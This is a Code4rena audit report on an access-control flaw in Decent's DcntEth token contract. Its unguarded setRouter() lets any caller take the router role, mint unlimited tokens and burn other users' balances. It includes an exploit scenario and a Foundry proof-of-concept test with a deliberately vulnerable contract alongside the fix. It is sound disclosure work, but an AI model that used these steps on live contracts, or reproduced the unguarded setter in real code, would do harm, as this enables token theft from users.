Decent - adeolu's results

Decent enables one-click transactions using any token across chains.

General Information

Platform: Code4rena

Start Date: 19/01/2024

Pot Size: $36,500 USDC

Total HM: 9

Participants: 113

Period: 3 days

Judge: 0xsomeone

Id: 322

League: ETH

Findings Distribution

Researcher Performance

Rank: 94/113

Findings: 1

Award: $0.12

🌟 Selected for report: 0

🚀 Solo Findings: 0

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20

Vulnerability details

Impact

The function setRouter() has no access control, so anyone can call it and set the router address to any address of their choosing. Because mint() and burn() are guarded only by the onlyRouter() modifier, unrestricted access to setRouter() is by extension unrestricted access to those functions: an attacker sets the router to their own address and can then mint an unlimited amount of tokens or burn tokens from any legitimate holder.

Exploit scenario

  • The attacker calls setRouter() to change the router address to their own address.
  • The attacker calls mint() to mint an unlimited amount of tokens to themselves and swaps them for USDC in a Uniswap pool.
  • The attacker calls burn() to burn tokens from another address, which can be a legitimate user or even the pool address.

Proof of Concept

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20C2-L22C6

```solidity
function setRouter(address _router) public {
    router = _router;
}
```

As the setRouter() code shows, there is no restriction on who may call it. The mint() and burn() functions below use the onlyRouter modifier and are meant to be callable only by the router address. Because setRouter() is unrestricted, an attacker can change the router to their own address and then call mint() and burn() successfully.

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L24C1-L30C6

```solidity
function mint(address _to, uint256 _amount) public onlyRouter {
    _mint(_to, _amount);
}

function burn(address _from, uint256 _amount) public onlyRouter {
    _burn(_from, _amount);
}
```

Tools Used

Manual review

Recommended Mitigation Steps

Add the onlyOwner modifier to the setRouter() function so that only the contract owner can change the router address.
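The exploit scenario and the recommended fix, as an added Foundry test that is not part of the original report or the Decent code base. The token below is a simplified stand-in for DcntEth (a plain balance mapping instead of the real ERC20/OFT base, a hand-written onlyOwner instead of whatever ownership library the project uses); only the router-gated mint/burn surface and the unguarded setRouter() are reproduced from the finding. The names VulnerableDcntEth, FixedDcntEth and the test addresses are assumptions made for this example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Simplified stand-in for DcntEth (example code, not the project's contract).
contract VulnerableDcntEth {
    address public owner;
    address public router;
    mapping(address => uint256) public balanceOf;

    modifier onlyRouter() {
        require(msg.sender == router, "not router");
        _;
    }

    constructor() {
        owner = msg.sender;
    }

    // VULNERABLE: no access control, anyone can point `router` at themselves.
    function setRouter(address _router) public virtual {
        router = _router;
    }

    function mint(address _to, uint256 _amount) public onlyRouter {
        balanceOf[_to] += _amount;
    }

    function burn(address _from, uint256 _amount) public onlyRouter {
        balanceOf[_from] -= _amount;
    }
}

// Hardened variant: only the owner may change the router.
contract FixedDcntEth is VulnerableDcntEth {
    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function setRouter(address _router) public override onlyOwner {
        router = _router;
    }
}

contract DcntEthAccessControlTest is Test {
    // Constructed test identities (assumed, not from the project).
    address deployer = makeAddr("deployer");
    address legitRouter = makeAddr("router");
    address attacker = makeAddr("attacker");
    address victim = makeAddr("victim");

    // Reproduces the finding: attacker takes over the router role, mints
    // to themselves and burns a legitimate holder's balance.
    function test_AttackerTakesOverRouter() public {
        vm.prank(deployer);
        VulnerableDcntEth token = new VulnerableDcntEth();

        // Legitimate setup: owner configures the router, router mints 100 to victim.
        vm.prank(deployer);
        token.setRouter(legitRouter);
        vm.prank(legitRouter);
        token.mint(victim, 100 ether);

        // Attack: nothing stops an arbitrary caller from becoming the router.
        vm.startPrank(attacker);
        token.setRouter(attacker);
        token.mint(attacker, 1_000_000 ether);
        token.burn(victim, 100 ether);
        vm.stopPrank();

        assertEq(token.balanceOf(attacker), 1_000_000 ether);
        assertEq(token.balanceOf(victim), 0);
    }

    // With onlyOwner on setRouter(), the same call from the attacker reverts
    // and the onlyRouter-gated functions stay out of reach.
    function test_FixBlocksAttacker() public {
        vm.prank(deployer);
        FixedDcntEth token = new FixedDcntEth();

        vm.prank(attacker);
        vm.expectRevert("not owner");
        token.setRouter(attacker);

        vm.prank(attacker);
        vm.expectRevert("not router");
        token.mint(attacker, 1 ether);
    }
}
```

Run with `forge test --match-contract DcntEthAccessControlTest`. The first test passes because the vulnerable contract lets the attack through; the second passes only once setRouter() is owner-gated, which is the check a reviewer should look for on any setter that controls a privileged role.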

Assessed type

Access Control

#0 - c4-pre-sort

2024-01-23T22:34:38Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2024-01-23T22:34:50Z

raymondfam marked the issue as duplicate of #14

#2 - c4-judge

2024-02-03T13:30:49Z

alex-ppg marked the issue as satisfactory
